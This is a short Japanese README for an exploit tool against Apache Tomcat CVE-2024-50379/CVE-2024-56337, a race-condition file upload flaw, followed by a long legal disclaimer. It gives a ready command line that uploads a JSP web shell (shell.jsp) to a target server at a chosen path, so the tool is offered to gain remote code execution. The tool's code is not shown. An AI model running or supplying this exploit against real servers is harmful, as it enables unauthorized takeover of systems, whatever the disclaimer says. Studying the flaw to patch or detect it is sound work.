
tomcat CVE-2024-50379/CVE-2024-56337 競合状態ファイルアップロードエクスプロイト
手動での悪用は面倒なので、expをでっち上げました。。
使い方:
shell.jspはシェルファイル、ggsl.jspはターゲットサーバーに保存する名前/パスです。
./CVE-2024-50379 -u http://192.168.2.245:8080 -f shell.jsp -p ggsl.jsp


本ツールは正規に許可された企業のセキュリティ構築行為のみを対象としています。本ツールの可用性をテストする必要がある場合は、ご自身で標的環境を構築してください。
本ツールを使用して検出を行う際には、その行為が現地の法律・規制に適合し、かつ十分な許可を得ていることを確認してください。許可されていない対象へのスキャンは行わないでください。
本ツールの使用過程において何らかの違法行為が発生した場合、その結果は利用者自身が負うものとし、当方は一切の法的責任及び連帯責任を負いません。
本ツールをインストールして使用する前に、必ず各条項を注意深く読み、十分に理解してください。制限条項、免責条項、またはその他の利用者の重要な権益に関わる条項は、太字や下線などで強調表示される場合があります。特に注意してください。本契約のすべての条項を十分に読み、完全に理解し、同意した場合を除き、本ツールをインストール・使用しないでください。本ツールを使用する行為、またはその他の明示的もしくは黙示的な方法で本契約を受け入れた場合、本契約を読み、同意したものとみなされます。